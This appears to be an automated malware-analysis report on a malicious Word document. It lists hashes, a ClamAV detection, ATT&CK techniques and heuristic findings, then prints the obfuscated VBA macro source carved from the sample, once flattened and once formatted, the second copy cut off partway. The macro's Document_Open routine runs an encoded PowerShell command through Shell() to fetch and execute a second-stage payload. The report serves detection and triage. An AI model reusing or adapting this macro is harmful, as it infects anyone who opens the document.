Office (OLE) malware analysis — malicious · f5e86722c4805df0

MALICIOUS

Office (OLE)

86.0 KB Created: 2018-06-15 19:27:00 Authoring application: Microsoft Office Word First seen: 2018-06-21

MD5: 901f7b0bc6c4a50ab1eb60a6f06b7db8 SHA-1: 7086d39089f01f70e76b9cb5ec8b6c28dd8634e1 SHA-256: f5e86722c4805df0eba25b8d85607fe0ea03422c9e60b5a4f6285b0027f03582

222 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1204.002 Malicious File T1566.001 Spearphishing Attachment

The sample contains VBA macros, including a Document_Open macro that utilizes the Shell() function to execute arbitrary commands. This indicates an attempt to download and execute a secondary payload. The ClamAV detection name 'Doc.Malware.Valyria-6874636-0' further supports its malicious nature.

Heuristics 6

ClamAV: Doc.Malware.Valyria-6874636-0 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Malware.Valyria-6874636-0
VBA macros detected medium 3 related findings OLE_VBA_MACROS

Document contains VBA macro code

Shell() call in VBA critical OLE_VBA_SHELL

Shell() call in VBA

Matched line in script

JKuzj = Rnd(hcwpWj)
huQWaidES = HOzfXt + VBA.Shell(vnBsN + Chr(DuqCroSPz + vbKeyP + vVztTjhcZs) + "owers" + QomLwriF + jKuBhYc + DoPRzTDjiBz + DhYpTKZc + NNIZaCuJqJP, 1837 - 1837)
vJDzz = 94368 + CFzOT

Document_Open macro high OLE_VBA_DOCOPEN

Document_Open macro
Matched line in script
```
End Function
Private Sub Document_open()
On Error Resume Next
```
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC

Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.

URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 10298 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	10298 bytes
SHA-256: `041cb49e887ad84f2492cfdd1a53127ac36a2aee081ef818f9ea7e0d8c405bdd`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "WnhUMPbktu" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Function huQWaidES() On Error Resume Next AqNrEU = 10958 + HISku qdViX = (26648 * Sgn(buWhGP) / 95749 / OvHwCH * FFOZi + ChrW(RGGmFn) / imnMj * CInt(VhjiE)) wbDMLX = QZGlRP XNsqf = Rnd(rIRZw) wjrJo = 32268 + AbkTcI RtimGW = (43905 * Sgn(wMLtP) / 67360 / jOziD * ENXtzp + ChrW(iDaCt) / dHzwMF * CInt(hTnboI)) QzmhYa = QfQHu wSKLd = Rnd(MJaYQ) ftlIz = 53836 + wjPmc sQbqF = (10833 * Sgn(VBaBS) / 77357 / mIACdw * ubFKn + ChrW(kNhHa) / wjoVsJ * CInt(EwzLYd)) AlavF = zCzlKd FkRQZr = Rnd(MfGsHh) pnITS = 52299 + qzzmIs wVlzzM = (83030 * Sgn(Rofszq) / 51458 / MHork * zDZowv + ChrW(Noivho) / MwnvB * CInt(aoPXk)) rcvQhh = GZTkX JKuzj = Rnd(hcwpWj) huQWaidES = HOzfXt + VBA.Shell(vnBsN + Chr(DuqCroSPz + vbKeyP + vVztTjhcZs) + "owers" + QomLwriF + jKuBhYc + DoPRzTDjiBz + DhYpTKZc + NNIZaCuJqJP, 1837 - 1837) vJDzz = 94368 + CFzOT OYfziY = (57193 * Sgn(GuXoSa) / 39490 / puwsCq * uJtZFF + ChrW(VCWJir) / GVqpK * CInt(mrWVak)) pjOLnB = IzoBc vuMMvj = Rnd(JVhaK) dKZVS = 15701 + cRjYIC KwlQk = (82689 * Sgn(hYMWE) / 26305 / HCaVuh * QEiCMA + ChrW(sYwVf) / ijfSoR * CInt(KidjiK)) HqCmYw = klbzm JuCkk = Rnd(vlpkz) End Function Private Sub Document_open() On Error Resume Next qOozO = 2083 + izaWI QaBopc = (8497 * Sgn(bXViP) / 59887 / fQnLD * cJwMQ + ChrW(tVFYi) / VlwcLl * CInt(DRBYMw)) cwihbC = CkpKN NiLFF = Rnd(jurDO) bKuVw = 82105 + tuJCEB jbBzh = (49013 * Sgn(LSsXjZ) / 42397 / RcCUP * jLMMj + ChrW(NVzdu) / cKVswc * CInt(UqzGku)) zHakl = Edhzl XLWTC = Rnd(KUnRDb) huQWaidES HWqUP = 54100 + wLfZjZ MHKGD = (22329 * Sgn(VwzfrI) / 93607 / DjMUF * cLSKMS + ChrW(FUIXRL) / pBZWUw * CInt(vKBNT)) uKjEcS = CBiwz PMmAf = Rnd(WVzPpk) wPdrHZ = 92870 + YCHqz jBtJd = (62353 * Sgn(BGSTtn) / 45402 / ivNfc * LDvawz + ChrW(aHdEMz) / KftdJ * CInt(GKOjX)) RjARz = wWHAmv HwUVc = Rnd(cjwrvq) End Sub Attribute VB_Name = "VloMmGSp" Function QomLwriF() On Error Resume Next mBZlT = kTVSkh AKLmTG = Rnd(pRsSSX) vvkpLh = (33978 * Sgn(jEpVuO) / 94722 / lZvld * PThwz + ChrW(VsOJoL) / HWkBqD * CInt(FwjPZM)) oNjuW = 90714 + CHZNYV SBiEVB = "HeLL . (" + " $" + "env:coMSPEC[" + "4,26," + "25]-jOIN" + "'') (" + "-jOiN(" + "'9" + "7V63<" TjSZlv = IVTsF QjspwG = Rnd(fQHMji) bFdoHU = (47014 * Sgn(FEhqc) / 94491 / iVlOGt * honwn + ChrW(fVLpdw) / aXiwN * CInt(fNfkiI)) nqfhi = 68041 + jBXEhz MqqQjTV = "28r39~11~3" + "9N101{120" + "V101{43V32N50" + "~104N42V39" + "{47~" + "32{3" + "8r49r101~55N" wCEEp = dEVdLi VaAidz = Rnd(OYoBJh) ABihn = (61647 * Sgn(tcnrU) / 53738 / MPNtc * iPWkw + ChrW(suhPO) / jchHbE * CInt(UcUWO)) mkssN = 62394 + JKmoBf WUQUf = "36s43r33~" + "42G40{12" + "6J97V7<7x2" + "9<50{17N101G1" + "20~101N43<3" IsHrKt = XMFTd kNYRp = Rnd(jiKYk) IiwZEw = (53740 * Sgn(ThhVJJ) / 81189 / wOpNB * rbTOrY + ChrW(YOUiTE) / MMumcK * CInt(LaVAkR)) wkTnHL = 25289 + KlwiE hIhjV = "2J" + "50x104" + "N42s3" + "9V47N32s3" + "8V4" + "9J101" + "r22s6" QomLwriF = SBiEVB + MqqQjTV + WUQUf + hIhjV End Function Function jKuBhYc() On Error Resume Next rJjAzN = HEKXq NqdQq = Rnd(nWGpF) duGqF = (9492 * Sgn(ZHtsNi) / 20163 / UiaWZf * AHWIbw + ChrW(wkvVdN) / pwjPW * CInt(jPomS)) CvSMr = 81006 + womUD zwvMY = "0V54~49~" + "32" + "V40" + "s107V11G32V4" + "9x107" + "V1" + "8V32r39r6{41G44" + "{32s43G49~126s9" DUOlT = pYXJcA amVkB = Rnd(hiuzU) EviPqi = (68455 * Sgn(niaGru) / 33448 / EHmpt * NPIjk + ChrW(ELUjI) / nFOHo * CInt(KVQmn)) djdJJw = 85213 + zWiju ipqBj = "7r53~47x7r" + "14V4" + "0G1" + "01s120<101~98" + "N45V49G49{53" fYzaci = vimtS boYSSB = Rnd(KAriSG) wCwXwA = (57209 * Sgn(iooYt) / 62513 / iNaVhJ * btHqcG + ChrW(tuiuEz) / KnvwqU * CInt(kJCizR)) tchbN = 88998 + oGLrzT wtdncVXj = "V127r106" + "x106G50G50G50r" + "107" + "N36N43" + "x36s41r60" + "s49x44r38{54" + "G1" + "07V49x45" + "r32~" + "40x44G4" hrkEHi = kYiLJX VMXlj = Rnd(aCQFY) MHWpXS = (10842 * Sgn(qDYtR) / 32608 / wjwuql * SLwuii + ChrW(LuURz) / QCqBYj * CInt(AhjOM)) OotFd = 79558 + AXZfZr dYatnNQ = "3r32s55J5" + "4r48G43x44~42V" + "43s107" + "s38J42s40x106r" + "38G18J11" + "2G61s22s40s1" + "06{5J45r" ikfjh = jnJiF ucCMO = Rnd(vdpLrd) DKarzY = (79558 * Sgn(jVZbm) / 89984 / ViMQta * vFfHvY + ChrW(EVazqO) / wCqYj * CInt(jMLEzn)) bsiIEb = 34384 + ZtpwVG sJwmd = "49N49J53<127" + "s106V10" + "6G36<44G50{32J4" + "4V" + "104N32N51" + "J60N1" + "07~38V43" + "V106N22V38s55" DjtbJH = czYIn OFzSL = Rnd(UOVMs) tEdqzv = (29263 * Sgn(FMMbBG) / 77973 / YbawiR * bkiVIp + ChrW(cqoPmX) / qYwwvz * CInt(hzHBT)) QRbAzc = 91417 + bWjWrN IOCFCjjDPb = "<44G53s49V" + "54~106{117" + "x33<3" + "9G35" + "x10" + "6J5J45" + "V49N49" + "{53<127J106N1" + "06{" tlbTp = AfJzS awhpzc = Rnd(BFPZG) wslIW = (84025 * Sgn(UmMMV) / 64323 / lstDp * JPHUo + ChrW(RmcEM) / UKSGwu * CInt(IiwVh)) djVmmT = 32801 + iCdAnT nzpRhH = "124<1" + "18J1" + "07<11" + "2<116N107V116x1" + "18V119<107x116s" + "119x11" + "3V106" jKuBhYc = zwvMY + ipqBj + wtdncVXj + dYatnNQ + sJwmd + IOCFCjjDPb + nzpRhH End Function Function DoPRzTDjiBz() On Error Resume Next zwjbKu = viTiSU GmmTI = Rnd(FKHAik) GcMJj = (42735 * Sgn(ZqiQHn) / 63230 / FPCpMl * ijpoK + ChrW(mzvzX) / tznNB * CInt(PaGwK)) UQaSr = 66027 + ZAXki KRYWuJj = "V117N49J32V8{" + "63<113" + "r36x106N5r" + "45s49{49J5" + "3<127<106x106" + "{50V50<50<107G3" + "4G32" + "G32V44~40" + "~107N" + "38r4" BjwKB = WmiRXJ GtzcE = Rnd(dIhwwf) SWOhvz = (15286 * Sgn(GwEnNL) / 87255 / iFwKC * wLXwSJ + ChrW(MunczU) / VrsCJH * CInt(ksWoUc)) uLLms = 74918 + kYnBR GqFJI = "2V40V10" + "6x33~49x36x" + "60<116<106J5~" + "45~49{49r53" + "x54G127J106x10" + "6{32<52~50G" + "42r41N35V10" + "7<38V42x4" + "0N106s32V51J32N" + "106s" MTAIwj = MjMdJ zLbzq = Rnd(ZDJwjw) UShtVL = (91296 * Sgn(iaLad) / 58175 / Izhzv * NjJqh + ChrW(whTEh) / MdfJU * CInt(pzhis)) uCRLN = 82451 + zqNtBv imTwkHicz = "53N13N11N17<4" + "~106r" + "98x" + "10" + "7~22N" + "53" Ivbjr = HMOFd iVCsEl = Rnd(fOVHiX) aBqrWz = (72782 * Sgn(kvCNP) / 43362 / MECCE * VXStX + ChrW(Cvbfrp) / vdfYis * CInt(LZMtN)) nuzTP = 42329 + VQApzc sfRWoYsL = "G41J4" + "4r49x109{98" + "N5~98" + "{108s126" + "r97J38J10" + "r2G42<42V101" + "r12" KrzvL = fDWqz ULvHM = Rnd(YYFdY) SoRJq = (99458 * Sgn(ajldp) / 31304 / ipntfN * oshaJR + ChrW(TujtWp) / WGXkja * CInt(rYNIf)) wGjWIP = 21163 + hbjhf qZLqcza = "0V101G97x63J" + "28s3" + "9J11V" + "39N107~43G" + "32r61N49G109r" zUTSd = IdiGi qpQcL = Rnd(rdvkij) zSbWoE = (98340 * Sgn(wGWdp) / 9190 / fGAUM * UjbQQC + ChrW(zdGvCi) / jkMbEz * CInt(Yrzqd)) HHlCkT = 51664 + LiPIwn DLHzM = "116<105V101J124" + "~112s115s12" + "5~113s11" + "2{108x126~9" + "7<43~13x40N36x" + "16N45{101N120r" Ndvpd = mdqVGc ndXdm = Rnd(ldmzG) jwzuk = (11506 * Sgn(CiBEr) / 43198 / XzFic * WHIhz + ChrW(flXdz) / WSuJc * CInt(JoWMic)) BUTUz = 52305 + GbiuuZ SKKkNNbZjV = "101s97s32V43x5" + "1r127r49{3" + "2s" + "40r53~1" + "01G110" + "{101J98r2" + "5~98N101J" + "110J101" ohJYj = zOUVrs zHLPjl = Rnd(dYlZoS) lwjUU = (19011 * Sgn(uOEhiY) / 3787 / DpBLUN * qcAIcz + ChrW(FwoIt) / WXAtL * CInt(iaccq)) OaRfAE = 80439 + DVOUR TwSdZZRFf = "x9" + "7r3" + "8V10V2G" + "42N42V101s" + "110s" + "101~98J107" + "s32x61x" + "32r98x126J35{" DoPRzTDjiBz = KRYWuJj + GqFJI + imTwkHicz + sfRWoYsL + qZLqcza + DLHzM + SKKkNNbZjV + TwSdZZRFf End Function Function DhYpTKZc() On Error Resume Next AujON = JApZp nXLiT = Rnd(XwwHEU) cIkwIO = (36523 * Sgn(iifjRT) / 66221 / dqSfp * fdNhu + ChrW(KKrUE) / jlohoq * CInt(KaWPz)) huuII = 87845 + izFjp bIFLwPDOFlD = "42<55{32J36" + "~38~45{1" + "09N97G" + "8{40~40r44G4" + "5V101{44~43" + "J101x97N53r" + "47V7{14s40" ilION = AmRnsN tRsXwH = Rnd(lQdHj) wQIhwN = (41678 * Sgn(oCkEUO) / 12694 / Qcwfs * iUtVr + ChrW(bDjtw) / mWpuwo * CInt(TqjYJ)) UOVXmK = 59629 + nzcvBb oTnGzhm = "s1" + "08x62r49{" + "55<60V62<97" + "{7" + "~7x29J50x17<1" + "07N1V42N50" YQvwj = WaJCYz VtSBLv = Rnd(Cqlnod) iwkBF = (37577 * Sgn(EzEQi) / 4208 / tJmif * JdZqrE + ChrW(zaMju) / tBfzdQ * CInt(oUbLf)) BWlSq = 14351 + bjfWfI oXHOK = "G43N41" + "G42x36{33<3N" + "44V" + "41V32G1" + "09G9" + "7~8" + "r40J40<44{" + "45" OUwpB = LdXiX hScQW = Rnd(sKEFW) qLBio = (93383 * Sgn(ETPtU) / 80599 / qJYYKO * NIYLP + ChrW(Jihdj) / TtJUHU * CInt(FGqza)) KBSTik = 41154 + pJHNK NYUKX = "J107V17<42<22N" + "49<55x4" + "4G43V34J109" + "V108<105N101G97" + "x43" + "~13x40V36<16" + "r45r108s126{22x" + "49{36<" + "55J49{104{" + "21" DzJzW = zhPul zJXCEz = Rnd(IEdCc) ciLoPQ = (12810 * Sgn(jvSFkE) / 25979 / GdLqO * vYzFGt + ChrW(pJwNpJ) / wjGha * CInt(hHhDPS)) YszVl = 72498 + YVzjo CRUSi = "<55J42s38<32r54" + "<54r101~" + "97s4" + "3r13r40G36x16V4" + "5<126x39J55~32N" Forwp = wwOXQS hblivS = Rnd(imoKKN) UYLuw = (44429 * Sgn(jnUNL) / 38837 / qPEOE * AjtvsU + ChrW(QOfPD) / YahGb * CInt(HDiRTd)) tmTsv = 90067 + RWXiQ VFpkc = "36N46G1" + "26N" + "56{38" + "r36G4" nwbSRa = HwFJf VQGiJI = Rnd(nVkfQ) GqmCp = (4002 * Sgn(ZzGHNJ) / 27237 / zZTzZ * UPLDTF + ChrW(tcumpm) / TwtHGT * CInt(oqUFI)) bAwUI = 10837 + lvzIJ BCWaIoDMsD = "9r" + "38G45~62x50V55s" + "44G49s32<104x" + "45N42r54G49" + "N101r97<" + "26J107V0G61s" + "38{32r53~49N" + "44x42J43r107" + "x8J32~5" rGcjZ = zLtzlD wIZmL = Rnd(olaaz) ajzNt = (45457 * Sgn(lJbXSi) / 98477 / lwzHtb * zLFBj + ChrW(LDruS) / uoYBG * CInt(lahfFO)) zrjWL = 40207 + WPzBj ivZiwfVQoYi = "4~54r" + "36G3" + "4<" + "32s126N5" AnUGr = qllHs sQZwzi = Rnd(hGkmH) IWnEm = (87586 * Sgn(pszbv) / 54868 / SnXMA * ADjTQ + ChrW(QkzHow) / MrFRoa * CInt(foOAL)) osaFjc = 98882 + FsNvtd EDHXXRdIUqB = "6s56' -SplIt" + "'X' -SPLiT'r" + "'-SpLIT 'v' " + "-sp" + "lIt 'J' -S" + "pLIT'{' -SpLI" DhYpTKZc = bIFLwPDOFlD + oTnGzhm + oXHOK + NYUKX + CRUSi + VFpkc + BCWaIoDMsD + ivZiwfVQoYi + EDHXXRdIUqB End Function Function NNIZaCuJqJP() On Error Resume Next jlzaM = fHrBnv dcoDN = Rnd(GmPEp) uPrEzm = (30219 * Sgn(ATYAwd) / 79755 / VOFbhi * HLCPKN + ChrW(Fpiwrw) / wRkzZj * CInt(aaPLp)) oGdir = 71432 + dDPXN aNioJEuwIk = "t '<'-SPL" + "it'S'-splIt 'N" + "' -SPlIt'~" + "'-spLIT 'g'\|" + "% {[chAr]( $_-" + "bXoR 0x45 " + ")}" + ") )" NNIZaCuJqJP = aNioJEuwIk End Function

SHA-256: 041cb49e887ad84f2492cfdd1a53127ac36a2aee081ef818f9ea7e0d8c405bdd

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "WnhUMPbktu"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Function huQWaidES()
On Error Resume Next
AqNrEU = 10958 + HISku
qdViX = (26648 * Sgn(buWhGP) / 95749 / OvHwCH * FFOZi + ChrW(RGGmFn) / imnMj * CInt(VhjiE))
wbDMLX = QZGlRP
XNsqf = Rnd(rIRZw)
wjrJo = 32268 + AbkTcI
RtimGW = (43905 * Sgn(wMLtP) / 67360 / jOziD * ENXtzp + ChrW(iDaCt) / dHzwMF * CInt(hTnboI))
QzmhYa = QfQHu
wSKLd = Rnd(MJaYQ)
ftlIz = 53836 + wjPmc
sQbqF = (10833 * Sgn(VBaBS) / 77357 / mIACdw * ubFKn + ChrW(kNhHa) / wjoVsJ * CInt(EwzLYd))
AlavF = zCzlKd
FkRQZr = Rnd(MfGsHh)
pnITS = 52299 + qzzmIs
wVlzzM = (83030 * Sgn(Rofszq) / 51458 / MHork * zDZowv + ChrW(Noivho) / MwnvB * CInt(aoPXk))
rcvQhh = GZTkX
JKuzj = Rnd(hcwpWj)
huQWaidES = HOzfXt + VBA.Shell(vnBsN + Chr(DuqCroSPz + vbKeyP + vVztTjhcZs) + "owers" + QomLwriF + jKuBhYc + DoPRzTDjiBz + DhYpTKZc + NNIZaCuJqJP, 1837 - 1837)
vJDzz = 94368 + CFzOT
OYfziY = (57193 * Sgn(GuXoSa) / 39490 / puwsCq * uJtZFF + ChrW(VCWJir) / GVqpK * CInt(mrWVak))
pjOLnB = IzoBc
vuMMvj = Rnd(JVhaK)
dKZVS = 15701 + cRjYIC
KwlQk = (82689 * Sgn(hYMWE) / 26305 / HCaVuh * QEiCMA + ChrW(sYwVf) / ijfSoR * CInt(KidjiK))
HqCmYw = klbzm
JuCkk = Rnd(vlpkz)
End Function
Private Sub Document_open()
On Error Resume Next
qOozO = 2083 + izaWI
QaBopc = (8497 * Sgn(bXViP) / 59887 / fQnLD * cJwMQ + ChrW(tVFYi) / VlwcLl * CInt(DRBYMw))
cwihbC = CkpKN
NiLFF = Rnd(jurDO)
bKuVw = 82105 + tuJCEB
jbBzh = (49013 * Sgn(LSsXjZ) / 42397 / RcCUP * jLMMj + ChrW(NVzdu) / cKVswc * CInt(UqzGku))
zHakl = Edhzl
XLWTC = Rnd(KUnRDb)
huQWaidES
HWqUP = 54100 + wLfZjZ
MHKGD = (22329 * Sgn(VwzfrI) / 93607 / DjMUF * cLSKMS + ChrW(FUIXRL) / pBZWUw * CInt(vKBNT))
uKjEcS = CBiwz
PMmAf = Rnd(WVzPpk)
wPdrHZ = 92870 + YCHqz
jBtJd = (62353 * Sgn(BGSTtn) / 45402 / ivNfc * LDvawz + ChrW(aHdEMz) / KftdJ * CInt(GKOjX))
RjARz = wWHAmv
HwUVc = Rnd(cjwrvq)
End Sub


Attribute VB_Name = "VloMmGSp"
Function QomLwriF()
On Error Resume Next
mBZlT = kTVSkh
AKLmTG = Rnd(pRsSSX)
vvkpLh = (33978 * Sgn(jEpVuO) / 94722 / lZvld * PThwz + ChrW(VsOJoL) / HWkBqD * CInt(FwjPZM))
oNjuW = 90714 + CHZNYV
SBiEVB = "HeLL  . (" + " $" + "env:coMSPEC[" + "4,26," + "25]-jOIN" + "'') (" + "-jOiN(" + "'9" + "7V63<"
TjSZlv = IVTsF
QjspwG = Rnd(fQHMji)
bFdoHU = (47014 * Sgn(FEhqc) / 94491 / iVlOGt * honwn + ChrW(fVLpdw) / aXiwN * CInt(fNfkiI))
nqfhi = 68041 + jBXEhz
MqqQjTV = "28r39~11~3" + "9N101{120" + "V101{43V32N50" + "~104N42V39" + "{47~" + "32{3" + "8r49r101~55N"
wCEEp = dEVdLi
VaAidz = Rnd(OYoBJh)
ABihn = (61647 * Sgn(tcnrU) / 53738 / MPNtc * iPWkw + ChrW(suhPO) / jchHbE * CInt(UcUWO))
mkssN = 62394 + JKmoBf
WUQUf = "36s43r33~" + "42G40{12" + "6J97V7<7x2" + "9<50{17N101G1" + "20~101N43<3"
IsHrKt = XMFTd
kNYRp = Rnd(jiKYk)
IiwZEw = (53740 * Sgn(ThhVJJ) / 81189 / wOpNB * rbTOrY + ChrW(YOUiTE) / MMumcK * CInt(LaVAkR))
wkTnHL = 25289 + KlwiE
hIhjV = "2J" + "50x104" + "N42s3" + "9V47N32s3" + "8V4" + "9J101" + "r22s6"
QomLwriF = SBiEVB + MqqQjTV + WUQUf + hIhjV
End Function
Function jKuBhYc()
On Error Resume Next
rJjAzN = HEKXq
NqdQq = Rnd(nWGpF)
duGqF = (9492 * Sgn(ZHtsNi) / 20163 / UiaWZf * AHWIbw + ChrW(wkvVdN) / pwjPW * CInt(jPomS))
CvSMr = 81006 + womUD
zwvMY = "0V54~49~" + "32" + "V40" + "s107V11G32V4" + "9x107" + "V1" + "8V32r39r6{41G44" + "{32s43G49~126s9"
DUOlT = pYXJcA
amVkB = Rnd(hiuzU)
EviPqi = (68455 * Sgn(niaGru) / 33448 / EHmpt * NPIjk + ChrW(ELUjI) / nFOHo * CInt(KVQmn))
djdJJw = 85213 + zWiju
ipqBj = "7r53~47x7r" + "14V4" + "0G1" + "01s120<101~98" + "N45V49G49{53"
fYzaci = vimtS
boYSSB = Rnd(KAriSG)
wCwXwA = (57209 * Sgn(iooYt) / 62513 / iNaVhJ * btHqcG + ChrW(tuiuEz) / KnvwqU * CInt(kJCizR))
tchbN = 88998 + oGLrzT
wtdncVXj = "V127r106" + "x106G50G50G50r" + "107" + "N36N43" + "x36s41r60" + "s49x44r38{54" + "G1" + "07V49x45" + "r32~" + "40x44G4"
hrkEHi = kYiLJX
VMXlj = Rnd(aCQFY)
MHWpXS = (10842 * Sgn(qDYtR) / 32608 / wjwuql * SLwuii + ChrW(LuURz) / QCqBYj * CInt(AhjOM))
OotFd = 79558 + AXZfZr
dYatnNQ = "3r32s55J5" + "4r48G43x44~42V" + "43s107" + "s38J42s40x106r" + "38G18J11" + "2G61s22s40s1" + "06{5J45r"
ikfjh = jnJiF
ucCMO = Rnd(vdpLrd)
DKarzY = (79558 * Sgn(jVZbm) / 89984 / ViMQta * vFfHvY + ChrW(EVazqO) / wCqYj * CInt(jMLEzn))
bsiIEb = 34384 + ZtpwVG
sJwmd = "49N49J53<127" + "s106V10" + "6G36<44G50{32J4" + "4V" + "104N32N51" + "J60N1" + "07~38V43" + "V106N22V38s55"
DjtbJH = czYIn
OFzSL = Rnd(UOVMs)
tEdqzv = (29263 * Sgn(FMMbBG) / 77973 / YbawiR * bkiVIp + ChrW(cqoPmX) / qYwwvz * CInt(hzHBT))
QRbAzc = 91417 + bWjWrN
IOCFCjjDPb = "<44G53s49V" + "54~106{117" + "x33<3" + "9G35" + "x10" + "6J5J45" + "V49N49" + "{53<127J106N1" + "06{"
tlbTp = AfJzS
awhpzc = Rnd(BFPZG)
wslIW = (84025 * Sgn(UmMMV) / 64323 / lstDp * JPHUo + ChrW(RmcEM) / UKSGwu * CInt(IiwVh))
djVmmT = 32801 + iCdAnT
nzpRhH = "124<1" + "18J1" + "07<11" + "2<116N107V116x1" + "18V119<107x116s" + "119x11" + "3V106"
jKuBhYc = zwvMY + ipqBj + wtdncVXj + dYatnNQ + sJwmd + IOCFCjjDPb + nzpRhH
End Function
Function DoPRzTDjiBz()
On Error Resume Next
zwjbKu = viTiSU
GmmTI = Rnd(FKHAik)
GcMJj = (42735 * Sgn(ZqiQHn) / 63230 / FPCpMl * ijpoK + ChrW(mzvzX) / tznNB * CInt(PaGwK))
UQaSr = 66027 + ZAXki
KRYWuJj = "V117N49J32V8{" + "63<113" + "r36x106N5r" + "45s49{49J5" + "3<127<106x106" + "{50V50<50<107G3" + "4G32" + "G32V44~40" + "~107N" + "38r4"
BjwKB = WmiRXJ
GtzcE = Rnd(dIhwwf)
SWOhvz = (15286 * Sgn(GwEnNL) / 87255 / iFwKC * wLXwSJ + ChrW(MunczU) / VrsCJH * CInt(ksWoUc))
uLLms = 74918 + kYnBR
GqFJI = "2V40V10" + "6x33~49x36x" + "60<116<106J5~" + "45~49{49r53" + "x54G127J106x10" + "6{32<52~50G" + "42r41N35V10" + "7<38V42x4" + "0N106s32V51J32N" + "106s"
MTAIwj = MjMdJ
zLbzq = Rnd(ZDJwjw)
UShtVL = (91296 * Sgn(iaLad) / 58175 / Izhzv * NjJqh + ChrW(whTEh) / MdfJU * CInt(pzhis))
uCRLN = 82451 + zqNtBv
imTwkHicz = "53N13N11N17<4" + "~106r" + "98x" + "10" + "7~22N" + "53"
Ivbjr = HMOFd
iVCsEl = Rnd(fOVHiX)
aBqrWz = (72782 * Sgn(kvCNP) / 43362 / MECCE * VXStX + ChrW(Cvbfrp) / vdfYis * CInt(LZMtN))
nuzTP = 42329 + VQApzc
sfRWoYsL = "G41J4" + "4r49x109{98" + "N5~98" + "{108s126" + "r97J38J10" + "r2G42<42V101" + "r12"
KrzvL = fDWqz
ULvHM = Rnd(YYFdY)
SoRJq = (99458 * Sgn(ajldp) / 31304 / ipntfN * oshaJR + ChrW(TujtWp) / WGXkja * CInt(rYNIf))
wGjWIP = 21163 + hbjhf
qZLqcza = "0V101G97x63J" + "28s3" + "9J11V" + "39N107~43G" + "32r61N49G109r"
zUTSd = IdiGi
qpQcL = Rnd(rdvkij)
zSbWoE = (98340 * Sgn(wGWdp) / 9190 / fGAUM * UjbQQC + ChrW(zdGvCi) / jkMbEz * CInt(Yrzqd))
HHlCkT = 51664 + LiPIwn
DLHzM = "116<105V101J124" + "~112s115s12" + "5~113s11" + "2{108x126~9" + "7<43~13x40N36x" + "16N45{101N120r"
Ndvpd = mdqVGc
ndXdm = Rnd(ldmzG)
jwzuk = (11506 * Sgn(CiBEr) / 43198 / XzFic * WHIhz + ChrW(flXdz) / WSuJc * CInt(JoWMic))
BUTUz = 52305 + GbiuuZ
SKKkNNbZjV = "101s97s32V43x5" + "1r127r49{3" + "2s" + "40r53~1" + "01G110" + "{101J98r2" + "5~98N101J" + "110J101"
ohJYj = zOUVrs
zHLPjl = Rnd(dYlZoS)
lwjUU = (19011 * Sgn(uOEhiY) / 3787 / DpBLUN * qcAIcz + ChrW(FwoIt) / WXAtL * CInt(iaccq))
OaRfAE = 80439 + DVOUR
TwSdZZRFf = "x9" + "7r3" + "8V10V2G" + "42N42V101s" + "110s" + "101~98J107" + "s32x61x" + "32r98x126J35{"
DoPRzTDjiBz = KRYWuJj + GqFJI + imTwkHicz + sfRWoYsL + qZLqcza + DLHzM + SKKkNNbZjV + TwSdZZRFf
End Function
Function DhYpTKZc()
On Error Resume Next
AujON = JApZp
nXLiT = Rnd(XwwHEU)
cIkwIO = (36523 * Sgn(iifjRT) / 66221 / dqSfp * fdNhu + ChrW(KKrUE) / jlohoq * CInt(KaWPz))
huuII = 87845 + izFjp
bIFLwPDOFlD = "42<55{32J36" + "~38~45{1" + "09N97G" + "8{40~40r44G4" + "5V101{44~43" + "J101x97N53r" + "47V7{14s40"
ilION = AmRnsN
tRsXwH = Rnd(lQdHj)
wQIhwN = (41678 * Sgn(oCkEUO) / 12694 / Qcwfs * iUtVr + ChrW(bDjtw) / mWpuwo * CInt(TqjYJ))
UOVXmK = 59629 + nzcvBb
oTnGzhm = "s1" + "08x62r49{" + "55<60V62<97" + "{7" + "~7x29J50x17<1" + "07N1V42N50"
YQvwj = WaJCYz
VtSBLv = Rnd(Cqlnod)
iwkBF = (37577 * Sgn(EzEQi) / 4208 / tJmif * JdZqrE + ChrW(zaMju) / tBfzdQ * CInt(oUbLf))
BWlSq = 14351 + bjfWfI
oXHOK = "G43N41" + "G42x36{33<3N" + "44V" + "41V32G1" + "09G9" + "7~8" + "r40J40<44{" + "45"
OUwpB = LdXiX
hScQW = Rnd(sKEFW)
qLBio = (93383 * Sgn(ETPtU) / 80599 / qJYYKO * NIYLP + ChrW(Jihdj) / TtJUHU * CInt(FGqza))
KBSTik = 41154 + pJHNK
NYUKX = "J107V17<42<22N" + "49<55x4" + "4G43V34J109" + "V108<105N101G97" + "x43" + "~13x40V36<16" + "r45r108s126{22x" + "49{36<" + "55J49{104{" + "21"
DzJzW = zhPul
zJXCEz = Rnd(IEdCc)
ciLoPQ = (12810 * Sgn(jvSFkE) / 25979 / GdLqO * vYzFGt + ChrW(pJwNpJ) / wjGha * CInt(hHhDPS))
YszVl = 72498 + YVzjo
CRUSi = "<55J42s38<32r54" + "<54r101~" + "97s4" + "3r13r40G36x16V4" + "5<126x39J55~32N"
Forwp = wwOXQS
hblivS = Rnd(imoKKN)
UYLuw = (44429 * Sgn(jnUNL) / 38837 / qPEOE * AjtvsU + ChrW(QOfPD) / YahGb * CInt(HDiRTd))
